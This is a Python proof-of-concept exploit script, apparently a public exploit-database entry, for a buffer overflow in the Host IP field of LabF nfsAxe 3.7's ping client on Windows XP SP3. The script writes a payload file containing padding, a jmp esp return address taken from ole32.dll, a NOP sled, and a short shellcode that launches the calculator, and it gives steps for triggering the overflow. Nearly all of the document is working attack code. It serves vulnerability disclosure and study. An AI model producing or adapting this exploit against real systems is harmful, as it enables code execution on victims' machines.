#!/usr/bin/python # Exploit Title: LabF nfsAxe 3.7 Ping Client - Buffer Overflow (Vanilla) # Date: 20-04-2019 # Exploit Author: Dino Covotsos - Telspace Systems # Vendor Homepage: http://www.labf.com/nfsaxe # Version: 3.7 # Software Link : http://www.labf.com/download/nfsaxe.exe # Contact: services[@]telspace.co.za # Twitter: @telspacesystems (Greets to the Telspace Crew) # Tested on: Windows XP SP3 ENG x86 # CVE: TBC from Mitre # PoC: # 1.) Generate nfsaxeping.txt, copy the contents to clipboard. # 2.) In the application(ping.exe) paste contents of clipboard in to "Host IP" and click ok. # 3.) Click Start and calc pops #0x775a693b : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.6435 (C:\WINDOWS\system32\ole32.dll) #Special thanks to John Leitch for the Windows XP SP3 EN Calc Shellcode (16 Bytes) shellcode = ("\x31\xC9" "\x51" "\x68\x63\x61\x6C\x63" "\x54" "\xB8\xC7\x93\xC2\x77" "\xFF\xD0") buffer = "A" * 29 + "\x3b\x69\x5a\x77" + "\x90" * 10 + shellcode + "C" * (220-29-4-10-16) payload = buffer try: f=open("nfsaxeping.txt","w") print "[+] Creating %s bytes ping payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"